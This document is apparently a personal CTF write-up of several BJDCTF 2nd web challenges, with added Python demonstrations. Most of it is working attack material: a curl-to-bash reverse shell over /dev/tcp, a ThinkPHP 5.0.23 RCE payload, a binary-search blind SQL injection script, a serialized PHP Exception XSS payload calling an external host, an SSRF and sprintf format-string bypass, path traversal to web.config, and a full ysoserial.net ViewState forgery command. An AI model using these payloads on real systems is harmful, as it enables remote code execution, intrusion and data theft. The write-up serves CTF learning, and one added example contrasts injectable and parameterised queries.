A note to myself, so I can look it up again when I forget.
fake google - link to a separate writeup (飛機票)
duangShell
- .index.php.swp source leak
- The landing page greets you with: how can i give you source code? .swp?!
- Download the vim swap file and let vim recover it (opening it directly shows garbage): vim -r index.php.swp, using whatever name you saved the swap file under, restores index.php.
exec() gives no output back in the response, and curl is not blocked, so bounce a reverse shell instead of trying to read the command result:
- Find the IP of the listening host (it has to be reachable from the target): ifconfig
- On that host, under /var/www/html, write a txt file (b.txt below) holding the reverse-shell one-liner, with ip the listening host's address and any free port:
bash -i >& /dev/tcp/ip/port 0>&1
- Listen on that port:
nc -lvp 1234
- POST the girl_friend parameter, which is what reaches exec(); curl fetches the file and bash runs it:
girl_friend=curl 174.1.145.235/b.txt|bash
- cat /flag in the shell turns up nothing; the flag isn't at that path
- Search for it instead:
grep -r "flag{" /etc
old-hack
The challenge is ThinkPHP 5. Firing the generic ThinkPHP 5 probe showed version 5.0.23, so I used the 5.0.23 RCE payload. I didn't see the flag at first and thought it hadn't worked; it was sitting at the very top of the response.
The payload abuses Request::method() in 5.0.x before 5.0.24: _method=__construct makes it re-run the Request constructor with the POST array, which overwrites the filter and server properties, and the later lookup of server['REQUEST_METHOD'] runs the value through that filter, i.e. system('cat /flag'). POST to:
/index.php?s=captcha
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat /flag
簡單注入 (Simple Injection)
hint.txt gives away the query: select * from users where username='$_POST["username"]' and password='$_POST["password"]';
I don't understand SQL injection well yet, so here is a master's binary-search blind injection script. The username admin\ ends in a backslash, so MySQL treats the quote after it as escaped: the username literal swallows everything up to the quote that was meant to open the password, and whatever is POSTed as password becomes live SQL. The condition is XORed onto the (false) username match, and the success marker "P3rh4ps" in the response is the boolean oracle.
import requests
import time

url = "http://523c9df3-1d44-44e8-bcc5-2a8ad35c3ff4.node3.buuoj.cn/"
password = ""
for i in range(1, 1000):
    time.sleep(0.06)
    low = 32
    high = 128
    mid = (low + high) // 2
    while low < high:
        # server-side: username='admin\' and password='^ (cond)#'  ->  0 ^ cond
        payload = '^ (ascii(substr((password),%d,1))>%d)#' % (i, mid)
        temp = {"username": "admin\\", "password": payload}
        r = requests.post(url, data=temp)
        print(low, high, mid, ":")
        if "P3rh4ps" in r.text:   # success marker: this character is > mid
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    if mid == 32 or mid == 127:   # nothing printable here: end of the string
        break
    password += chr(mid)
    print(password)
print("password=", password)
Binary-search injection really is fast = =
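As an added example (mine, not from the original post or the script's author), the same boolean blind extraction run offline against SQLite, with the string-built login from hint.txt beside a parameterised one. SQLite has no ascii() or ^ operator and does not treat a backslash as a quote escape, so the probe uses unicode() and breaks out of the password literal with ' or ... -- instead of the admin\ + XOR trick; the users table, the secret and the True/False oracle are constructed for the demo.

```python
import sqlite3

# Constructed sample data standing in for the challenge's users table.
SECRET_PASSWORD = "P3rh4ps_Y0u_N33d_H1nt"


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("create table users(username text, password text)")
    db.execute("insert into users values('admin', ?)", (SECRET_PASSWORD,))
    return db


def login_vulnerable(db, username, password):
    # Built the way hint.txt shows it: the POST values become SQL text.
    sql = "select * from users where username='%s' and password='%s'" % (username, password)
    return db.execute(sql).fetchone() is not None


def login_safe(db, username, password):
    # Parameterised: values travel separately from the SQL, so quotes stay data.
    sql = "select * from users where username=? and password=?"
    return db.execute(sql, (username, password)).fetchone() is not None


def extract(login, db, column="password", max_len=64):
    """Recover `column` for admin one character at a time via the login oracle.

    Each probe closes the password literal and ORs in a comparison on a single
    character; the oracle answers True when the comparison holds. Binary search
    over the code-point range costs ~7 requests per character instead of up to
    95 for a linear scan of printable ASCII.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        low, high = 0, 128
        while low < high:
            mid = (low + high) // 2
            # Past the end of the string substr() is '' and unicode('') is NULL,
            # so every comparison is false and the search settles on 0.
            probe = "' or (unicode(substr(%s,%d,1))>%d)--" % (column, pos, mid)
            if login(db, "admin", probe):
                low = mid + 1      # character code is > mid
            else:
                high = mid         # character code is <= mid
        if low == 0:
            break                  # end of string
        recovered += chr(low)
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login leaks:", extract(login_vulnerable, db))
    print("parameterised login leaks:", repr(extract(login_safe, db)))
```

Against login_safe the oracle never fires because the probe is compared as a literal password, so extract() returns an empty string; that is the whole difference the placeholder makes.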
XSS之光 (The Light of XSS)
A dirb scan turns up a .git leak, which gives up the source.
Deserialization with a PHP built-in class
This was my first encounter with deserializing a native class.
The target echoes the unserialized object, and Exception's __toString() renders its message unescaped, so an Exception whose message is a script tag puts that script straight into the page. I used the intranet XSS platform BUU provides for the callback.
<?php
$a = new Exception("<script src=http://xss.buuoj.cn/bL6BFw></script>");
echo urlencode(serialize($a));
Serialized and urlencoded (urlencoding is required because the protected/private property names contain NUL bytes):
O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A48%3A%22%3Cscript+src%3Dhttp%3A%2F%2Fxss.buuoj.cn%2FbL6BFw%3E%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A3%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
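Added example, not part of the original post: a Python re-implementation of the subset of PHP serialize() that the Exception payload uses, so the property-name mangling (\0*\0 for protected, \0Exception\0 for private) can be inspected before urlencoding. PhpObject and the function names are mine; the file/line defaults are the values from the page's output and are assumed not to matter for the XSS.

```python
from urllib.parse import quote_plus


class PhpObject:
    """Minimal stand-in for a PHP object: class name plus ordered properties.
    Property names carry PHP's visibility mangling, which is where the NUL
    bytes in the serialized form come from."""

    def __init__(self, cls):
        self.cls = cls
        self.props = []            # list of (mangled name, value)

    def public(self, name, value):
        self.props.append((name, value))
        return self

    def protected(self, name, value):
        self.props.append(("\0*\0" + name, value))
        return self

    def private(self, name, value):
        self.props.append(("\0%s\0%s" % (self.cls, name), value))
        return self


def php_serialize(value):
    """Subset of PHP serialize(): null, bool, int, string, array, object."""
    if value is None:
        return "N;"
    if isinstance(value, bool):
        return "b:%d;" % value
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        # The declared length is in bytes, not characters.
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, (list, dict)):
        items = value.items() if isinstance(value, dict) else enumerate(value)
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in items)
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, PhpObject):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props)
        return 'O:%d:"%s":%d:{%s}' % (len(value.cls), value.cls, len(value.props), body)
    raise TypeError("unsupported type: %r" % type(value))


def exception_payload(message, file="/usercode/file.php", line=3):
    """serialize(new Exception($message)) laid out as PHP does it: message,
    code, file and line are protected; string, trace and previous are private
    to Exception. file/line are whatever PHP recorded at construction (the
    defaults reproduce the page's sandbox values) and do not affect the XSS."""
    obj = (PhpObject("Exception")
           .protected("message", message)
           .private("string", "")
           .protected("code", 0)
           .protected("file", file)
           .protected("line", line)
           .private("trace", [])
           .private("previous", None))
    return php_serialize(obj)


def urlencoded_exception_payload(message):
    # PHP urlencode(): space -> '+', everything outside [A-Za-z0-9_.-] percent-encoded,
    # which is what keeps the \0 bytes intact in a query string.
    return quote_plus(exception_payload(message), safe="")


if __name__ == "__main__":
    print(urlencoded_exception_payload("<script src=http://xss.buuoj.cn/bL6BFw></script>"))
```

The generator reproduces the page's string byte for byte; swapping the message for any other tag works the same way, and the byte-length rule in php_serialize() is the thing hand-edited payloads most often get wrong.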
假豬套天下第一 (Fake Pig Set Is Number One)
Capturing the requests reveals L0g1n.php.
From there it's one header check nested inside the next:
Header info
- Change the time carried in the cookie
- Client-ip: 127.0.0.1 // X-Forwarded-For is not honoured here
- Referer: gem-love.com // origin page
- User-Agent: Commodore 64 // the system the client claims to be
- From: [email protected] // requester's e-mail
- Via: y1ng.vip // the proxy the request came through
文件探測 (File Detection)
The same old pattern = =. A response header hints at home.php, and robots.txt hints at admin.php, which only allows local access.
home.php's file parameter can read system.php's source through the php://filter wrapper; any other input gets .fxxkyou! appended to it, so the resource has to be the bare name system:
home.php?file=php://filter/read=convert.base64-encode/resource=system
Base64-decode the result to get the source, then audit it:
system.php
<?php
error_reporting(0);
if (!isset($_COOKIE['y1ng']) || $_COOKIE['y1ng'] !== sha1(md5('y1ng'))){ // cookie check
echo "<script>alert('why you are here!');alert('fxck your scanner');alert('fxck you! get out!');</script>";
header("Refresh:0.1;url=index.php");
die;
}
$str2 = ' Error: url invalid<br>~$ ';
$str3 = ' Error: damn hacker!<br>~$ ';
$str4 = ' Error: request method error<br>~$ ';
$filter1 = '/^http:\/\/127\.0\.0\.1\//i'; // must start with http://127.0.0.1/
$filter2 = '/.?f.?l.?a.?g.?/i'; // no "flag", even with a stray character between the letters
if (isset($_POST['q1']) && isset($_POST['q2']) && isset($_POST['q3']) ) {
$url = $_POST['q2'].".y1ng.txt";
$method = $_POST['q3'];
$str1 = "~$ python fuck.py -u \"".$url ."\" -M $method -U y1ng -P admin123123 --neglect-negative --debug --hint=xiangdemei<br>";
echo $str1;
if (!preg_match($filter1, $url) ){
die($str2);
}
if (preg_match($filter2, $url)) {
die($str3);
}
if (!preg_match('/^GET/i', $method) && !preg_match('/^POST/i', $method)) {
die($str4);
}
$detect = @file_get_contents($url, false);
print(sprintf("$url method&content_size:$method%d", $detect));
}
?>
- q1: no restriction
- q2: http://127.0.0.1/admin.php?a= so that the .y1ng.txt appended by the script lands in a harmless query parameter and the fetch hits admin.php from 127.0.0.1
- q3: must begin with GET or POST, and it is spliced into the sprintf() format string right before %d. With a plain GET the fetched body is handed to %d and cast to 0; with GET%s% the format becomes ...GET%s%%d, so %s prints the fetched body and %% turns the leftover %d into literal text:
GET%s%
admin.php
<?php
error_reporting(0);
session_start();
$f1ag = 'f1ag{s1mpl3_SSRF_@nd_spr1ntf}'; //fake
function aesEn($data, $key){
$method = 'AES-128-CBC';
$iv = md5($_SERVER['REMOTE_ADDR'],true);
return base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}
function Check(){
if (isset($_COOKIE['your_ip_address']) && $_COOKIE['your_ip_address'] === md5($_SERVER['REMOTE_ADDR']) && $_COOKIE['y1ng'] === sha1(md5('y1ng')))
return true;
else
return false;
}
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) { // local-only check
highlight_file(__FILE__);
} else {
echo "<head><title>403 Forbidden</title></head><body bgcolor=black><center><font size='10px' color=white><br>only 127.0.0.1 can access! You know what I mean right?<br>your ip address is " . $_SERVER['REMOTE_ADDR'];
}
$_SESSION['user'] = md5($_SERVER['REMOTE_ADDR']);
if (isset($_GET['decrypt'])) {
$decr = $_GET['decrypt'];
if (Check()){ // cookie check
$data = $_SESSION['secret'];
include 'flag_2sln2ndln2klnlksnf.php';
$cipher = aesEn($data, 'y1ng'); // call aesEn
if ($decr === $cipher){
echo WHAT_YOU_WANT;
} else {
die('爬');
}
} else{
header("Refresh:0.1;url=index.php");
}
}
else {
//I heard you can break PHP mt_rand seed
mt_srand(rand(0,9999999));
$length = mt_rand(40,80);
$_SESSION['secret'] = bin2hex(random_bytes($length));
}
The SSRF's only job was reading admin.php's source (highlight_file runs only for 127.0.0.1). The decrypt branch has no address check, so admin.php can be hit directly with ?decrypt=...: Check() has to pass (cookies your_ip_address=md5(our IP) and y1ng=sha1(md5('y1ng'))) and `$decr===$cipher` has to hold.
$cipher = aesEn($data, 'y1ng'): we just have to produce the same value. $_SESSION['secret'] is only ever set when decrypt is absent, so on a fresh session (send no PHPSESSID) $data is NULL.
$_SERVER['REMOTE_ADDR']
is our own address as the 403 page prints it, 174.0.222.75 here, and the IV is derived from it.
The function as it sits on the server:
function aesEn($data, $key){
    $method = 'AES-128-CBC';
    $iv = md5($_SERVER['REMOTE_ADDR'],true);
    return base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}
Local copy with the IV pinned to our own address so it runs offline:
function aesEn($data, $key)
{
    $method = 'AES-128-CBC';
    $iv = md5('174.0.222.75', true); // raw 16-byte digest, the same IV the server derives for us
    return base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}
$cipher = aesEn('NULL', 'y1ng');
echo urlencode($cipher); // 70klfZeYC+WlC045CcKhtg== ; the value must be URL-encoded before it goes into ?decrypt=
One thing to check: on the server $data is PHP's null (an unset session key), and openssl_encrypt() encrypts null as the empty string, whereas the four-character string 'NULL' pads and encrypts different bytes. If the server answers 爬 to the value above, pass NULL without quotes instead.
If running this locally fails with Call to undefined function openssl_encrypt(), find ;extension=php_openssl.dll in php.ini and remove the leading semicolon, or just run the snippet in an online PHP sandbox.
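Added example (mine, not from the challenge or the original post), in Python: the three preg_match() filters from system.php transcribed so q2 and q3 can be checked offline before sending, a small model of PHP's sprintf() that shows why a plain GET loses the fetched body to %d while GET%s% prints it, and the two cookies admin.php's Check() requires. The fetched body in the demo is a constructed placeholder; the AES value itself still comes from the PHP snippet above.

```python
import hashlib
import re

SUFFIX = ".y1ng.txt"   # system.php appends this to q2 before fetching the URL

# The three preg_match() filters from system.php, transcribed to Python.
FILTER_URL = re.compile(r"^http://127\.0\.0\.1/", re.I)
FILTER_FLAG = re.compile(r".?f.?l.?a.?g.?", re.I)
FILTER_METHOD = re.compile(r"^(GET|POST)", re.I)


def check_inputs(q2, q3):
    """Mirror of system.php's checks on the URL and method.
    Returns the error text the script would die() with, or None if it would
    go on to file_get_contents()."""
    url = q2 + SUFFIX
    if not FILTER_URL.search(url):
        return "Error: url invalid"
    if FILTER_FLAG.search(url):
        return "Error: damn hacker!"
    if not FILTER_METHOD.search(q3):
        return "Error: request method error"
    return None


def php_sprintf(fmt, *args):
    """Model of PHP's sprintf() for the %s, %d and %% conversions.
    The point of difference from Python's % operator: a non-numeric string
    handed to %d is silently cast to 0 instead of raising."""
    out, i, argi = [], 0, 0
    while i < len(fmt):
        if fmt[i] != "%":
            out.append(fmt[i])
            i += 1
            continue
        spec = fmt[i + 1] if i + 1 < len(fmt) else ""
        if spec == "%":
            out.append("%")
        elif spec == "s":
            out.append(str(args[argi]))
            argi += 1
        elif spec == "d":
            m = re.match(r"\s*[+-]?\d+", str(args[argi]))
            argi += 1
            out.append(str(int(m.group())) if m else "0")
        else:
            raise ValueError("conversion not modelled: %" + spec)
        i += 2
    return "".join(out)


def system_output(q2, q3, fetched):
    """What system.php prints: $url and $method are interpolated into the
    format string before sprintf() ever sees it, so q3 controls the conversions."""
    fmt = q2 + SUFFIX + " method&content_size:" + q3 + "%d"
    return php_sprintf(fmt, fetched)


def admin_cookies(remote_addr):
    """Cookies admin.php's Check() requires before the decrypt branch runs."""
    return {
        "your_ip_address": hashlib.md5(remote_addr.encode()).hexdigest(),
        "y1ng": hashlib.sha1(hashlib.md5(b"y1ng").hexdigest().encode()).hexdigest(),
    }


if __name__ == "__main__":
    q2 = "http://127.0.0.1/admin.php?a="
    body = "<?php ...admin.php source... ?>"      # constructed stand-in for the fetched page
    print(check_inputs(q2, "GET%s%"))             # None: all three filters pass
    print(system_output(q2, "GET", body))          # ends in GET0: the body was cast by %d
    print(system_output(q2, "GET%s%", body))       # the body, followed by a literal %d
    print(admin_cookies("174.0.222.75"))
```

Note that the flag filter only catches the letters f, l, a, g in that order with at most one character between each pair; the real flag file name on the page (flag_2sln2ndln2klnlksnf.php) does trip it, which is why the route goes through admin.php rather than fetching the flag file directly.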
EasyAspDotNet
Zhao's challenges are really something.
Background reading: 如何藉助ViewState在ASP.NET中實現反序列化漏洞利用
On the attack itself: 玩轉 ASP.NET VIEWSTATE 反序列化攻擊、建立無檔案後門
Inside, the image loader takes a path parameter: path=4.gif. Others had noted it is an arbitrary file read, which is enough to get web.config.
Go up a directory at a time until: path=../../web.config
It comes back as an image, so download it with curl:
curl -O "http://65b7c96b-2005-4b6b-ba0f-485176af77c7.node3.buuoj.cn/ImgLoad.aspx?path=../../web.config"
web.config holds the machineKey (validationKey, decryptionKey, validation algorithm), which is everything ysoserial.net's ViewState plugin needs to forge a ViewState with a valid MAC. The generator value is the page's __VIEWSTATEGENERATOR hidden field.
For the ActivitySurrogateSelectorFromFile gadget you need ExploitClass.cs (the sample that ships with ysoserial.net, edited to run your command) plus System.dll and System.Web.dll to compile it against.
Get ysoserial.net (grab the release that includes the exe) and run:
.\ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;./System.dll;./System.Web.dll" --generator="CA0B0334" --validationalg="SHA1" --validationkey="47A7D23AF52BEF07FB9EE7BD395CD9E19937682ECB288913CE758DE5035CF40DC4DB2B08479BF630CFEAF0BDFEE7242FC54D89745F7AF77790A4B5855A08EAC9" --decryptionkey="B0E528C949E59127E7469C9AF0764506BAFD2AB8150A75A5"
If you send it through Burp, watch the URL-encoding of the __VIEWSTATE parameter: the base64 contains + and = that must be encoded or the MAC check fails.
It dragged on for many days, but I finally finished reproducing everything; tomorrow I can do something else~~~~
Feel free to drop by my personal blog (link exchange welcome)
References
BJDCTF 2nd EasyAspDotNet WriteUp
第二屆BJDCTF 2020 全部WEB題目 Writeup
Konmu
玩轉 ASP.NET VIEWSTATE 反序列化攻擊、建立無檔案後門
如何藉助ViewState在ASP.NET中實現反序列化漏洞利用